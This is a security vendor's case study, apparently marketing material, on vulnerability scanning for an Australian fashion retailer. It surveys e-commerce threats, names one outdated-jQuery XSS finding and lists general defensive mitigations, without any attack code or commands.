Start Managing Your Vulnerabilities. CLICK HERE
Menu
Pilgrim Clothing, a leading women’s fashion brand in Australia, was founded in 1992. Rapidly expanding from a single store to 15 retail locations nationwide, Pilgrim quickly established itself as the go-to event wear label in the country.
However, the rise of online e-commerce presented significant challenges. To survive, Pilgrim had to adapt to the changing industry landscape. Embracing change, Pilgrim adopted a two-pronged strategy to ensure their continued success:
With the shift to e-commerce, Pilgrim encountered a new set of challenges—cybersecurity. E-commerce brands are prime targets for cybercriminals due to the personal and payment data they collect, particularly smaller brands that may lack the funding for a robust cybersecurity strategy.
Faced with the 30% increase in e-commerce cyberattacks in recent years, Pilgrim engaged xSpectre to enhance their cybersecurity measures, safeguarding their reputation and protecting their customers’ personal data.
Web skimming is a prevalent threat where cybercriminals inject malicious code into e-commerce sites to steal sensitive information, such as credit card details, during checkout. Magecart, a notorious cybercrime group, has been behind several high -profile incidents in recent times. While this type of attack is common, specific vulnerabilities can vary; for example, attackers may exploit outdated platforms like Magento 1.x that have not been upgraded to more secure versions.
Phishing remains a widespread threat where cybercriminals impersonate legitimate entities, such as banks or e-commerce sites, to trick users into revealing personal information or clicking on malicious links. While general phishing is common, sophisticated spear-phishing attacks targeting specific individuals within an organisation are less frequent but can be significantly damaging.
Malware, including viruses and spyware, poses a significant risk to e-commerce systems, potentially leading to data breaches or system disruptions. While general malware attacks are common, zero-day exploits—attacks targeting previously unknown vulnerabilities—are less common but can have severe effects.
DDoS attacks flood a website with excessive traffic, causing service outages. While such attacks are common, large-scale, sophisticated DDoS attacks designed to disrupt services during peak periods are less frequent but highly impactful.
XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. Although basic XSS attacks are common, advanced variants that can bypass modern security measures are rarer but more dangerous.
APIs are crucial for e-commerce functionality but can also be exploited by attackers to manipulate transactions or access sensitive data. While general API attacks are common, targeted and sophisticated API exploits are less frequent but can lead to significant security breaches.
The complex e-commerce supply chain, involving third-party vendors and logistics partners, can be a target for attacks. Although supply chain threats are common, highly targeted attacks aimed at specific suppliers are less frequent but can have extensive repercussions.
We initiated a thorough Vulnerability Management service, which involved scanning Pilgrim Clothing’s website and internal network. This service was designed to identify, assess, prioritise, and allow for mitigation of security vulnerabilities within their IT infrastructure. By systematically evaluating their systems, we aimed to reduce the risk of malicious cyberattacks and data breaches, ensuring a more secure environment for their online operations.
In addition to Vulnerability Management, we deployed a Web Application Scanner to crawl Pilgrim’s website. This tool was instrumental in identifying risks arising from updates, user activities, and system modifications. The scanner provided us with detailed insights into potential weaknesses in the website’s security framework.
Through these two services, we discovered six attack surfaces that Pilgrim Clothing was previously unaware of. Among these vulnerabilities, one was classified as critical, while the others were considered medium in severity.
For confidentiality purposes, we will only discuss one of these vulnerabilities in this case study. One significant issue identified was the jQuery 1.0.3 < XSS Vulnerability.
Imagine you’re managing a bustling online store where customers browse, click, and shop. Now, picture a hacker sneaking malicious code into your website. This is the essence of a Cross-Site Scripting (XSS) attack.
The attacker finds a vulnerability, such as a poorly sanitised input field, and inserts malicious code.
When a user visits the site, their browser executes this hidden code without their knowledge.
Rigorously validate and sanitise user inputs to prevent malicious code from being injected.
Implement a CSP to specify which scripts are allowed to run on your site.
Use WAFs to filter out suspicious requests and protect against attacks.
Train developers on secure coding practices to avoid common vulnerabilities.
